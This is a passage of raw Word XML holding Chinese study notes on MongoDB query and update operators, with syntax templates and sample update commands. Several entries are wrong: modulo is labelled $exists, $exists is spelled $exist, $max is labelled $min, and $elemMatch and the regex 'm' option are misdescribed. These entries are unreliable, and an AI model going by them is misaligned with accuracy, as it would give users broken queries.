              <w:tabs>
                <w:tab w:val="left" w:pos="720"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Aggregation pipeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关系运算符</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等于 =&gt; $eq  语法结构:{field:{$eq:value}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不等于 =&gt; $ne 语法结构:{field:{$ne:value}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大于 =&gt; $gt 语法结构:{field:{$gt:value}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大于等于 =&gt; $gte 语法结构:{field:{$gte:value}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>小于 =&gt; $lt  语法结构:{field:{$lt:value}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>小于等于 =&gt; $lte 语法结构:{field:{$lte:value}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包含 =&gt; $in 语法结构:{field:{$in:[value1,value2,...]}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不包含 =&gt; $nin 语法结构:{field:{$nin:[value1,value2,...]}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>逻辑运算符</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并且 =&gt; $and 语法结构:{$and:[ Expression1, Expression2, ...]}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者 =&gt; $or 语法结构:{$or:[ Expression1, Expression2, ...]}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或非 =&gt; $nor 语法结构:{$nor:[ Expression1, Expression2, ...]}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>非   =&gt; $not 语法结构:{field:{$not:{operation-exrpession}}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Expression例子：{price:{$eq:10}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>operation-exrpession例子:{$eq:10}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>元素运算符</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否存在 =&gt; $exists 语法结构:{field:{$exist:&lt;boolean&gt;}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否为该类型 =&gt; $type 语法结构:{field:{$type:&lt;BSON type&gt;}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>评估运算符</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>求模 =&gt; $exists 语法结构:{$field:{$mod:[除数，余数]}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正则表达式 =&gt; $regex 语法结构:{field:{$regex:/pattern/&lt;options&gt;}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>where条件 =&gt; $where 语法结构:{$where:function{ return &lt;Boolean&gt;; }}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>options枚举：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>i   =&gt; 忽略大小写</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>m  =&gt; 匹配多条结果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>x   =&gt; 忽略所有的空格</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>s   =&gt; .可以匹配所有的包扩新行在内的所有字符</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>数组运算符</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全部条件符合 =&gt; $all 语法结构:{field:{$all:[value1，value2， ...]}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任意条件符合 =&gt; $elemMatch 语法结构: {field:{$elemMatch:[query1，query2，...]}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数组长度符合 =&gt; $size 语法结构: {field:{$size:&lt;int32&gt;}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">query例子：{$gt : 100}  或者 {$eq: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> } </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>列修改运算符</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加法 =&gt; $inc 语法结构:{$inc:{field1:&lt;amount&gt;},{field2:&lt;amount&gt;},...}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>乘法 =&gt; $mul 语法结构:{$mul:{field1:&lt;number1&gt;,...}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改名称 =&gt; $rename 语法结构 : {$rename:{&lt;field1&gt;:&lt;NewName1&gt;,&lt;field2&gt;:&lt;NewName2&gt;,...}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">改值 =&gt; $set 语法结构 :{$set:{&lt;field1&gt;:&lt;value1&gt;,&lt;field2&gt;:&lt;value2&gt;,...}} </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>详解：如果修改的值不存在则新增，存在则修改</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="2520" w:hanging="2520" w:hangingChars="1200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">无法修改时则添加 =&gt; $setOnInsert语法结构：{$setOnInsert:&lt;field1&gt;:&lt;value1&gt;,...},{upsert:true}                        </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">详细解释: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="0070C0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如果update的更新参数upsert:true，也就是如果要更新的文档不存在的话会插入一条新的记录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，$setOnInsert操作符会将指定的值赋值给指定的字段，如果要更新的文档存在那么$setOnInsert操作符不做任何处理；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>删除列 =&gt; $unset 语法结构：{$unset:{&lt;field1&gt; :“”,... }}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>求最小值 =&gt; $min 语法结构：{$min:{&lt;field1&gt; : &lt;value1&gt;,...}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>求最大值 =&gt; $min 语法结构：{$max:{&lt;field1&gt; : &lt;value1&gt;,...}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>求当前时间 =&gt; $currentDate：{$currentDate:{&lt;field&gt;:}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>数组修改运算符</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首个元素的占位符 =&gt;  $ 语法结构:{</w:t>
      </w:r>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;Array&gt;.$</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:value}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例子：db.students.updateOne({_id:1,'grades':80},{$set:{'grades.$':90}});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这句命令的意思是修改id等于1并且grades包含80的数组，将grades里的第一个元素改成90</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所有元素的占位符 =&gt;  $[] 语法结构:{ &lt;update operator&gt;: { "&lt;array&gt;.$[]" : value } }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例子：db.students.update({ _id:4},</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{$inc:{'grades.$[].grade':100} //让所有的grade+100},</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{multi:true});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这句命令的意思是，修改_id等于4的数组，将grades里所有的grade加100</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加元素 =&gt; $addToSet 语法结构: {$addToSet:{field1:value1,.....}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果不存在则添加，如果存在则不添加。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出栈 =&gt; $pop 语法结构: {$pop:{&lt;field&gt;:&lt;-1 | 1&gt;,......}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例子：{ _id: 1, scores: [ 8, 9, 10 ] }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> //元数组</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLine="630" w:firstLineChars="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>db.students.update( { _id: 1 }, { $pop: { scores: -1 } } ) //移除第一个元素</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLine="630" w:firstLineChars="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{ _id: 1, scores: [ 9, 10 ] }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//出栈后</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当field的值为1时移除最后一个元素，为-1时移除第一个元素</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除 =&gt; $pull 语法结构:{ $pull: { &lt;field1&gt;: &lt;value|condition&gt;, &lt;field2&gt;: &lt;value|condition&gt;, ... } }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除数组中所有匹配条件的元素</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例子：db.stores.update({},</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{$pull:{fruits:{$in:['bananas','oranges']}}},</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{multi:true //别忘了加上这个，要不然只能修改一行});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这句命令的意思是删除数组中包含bananas和oranges的元素</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CRUD操作</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>新增</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
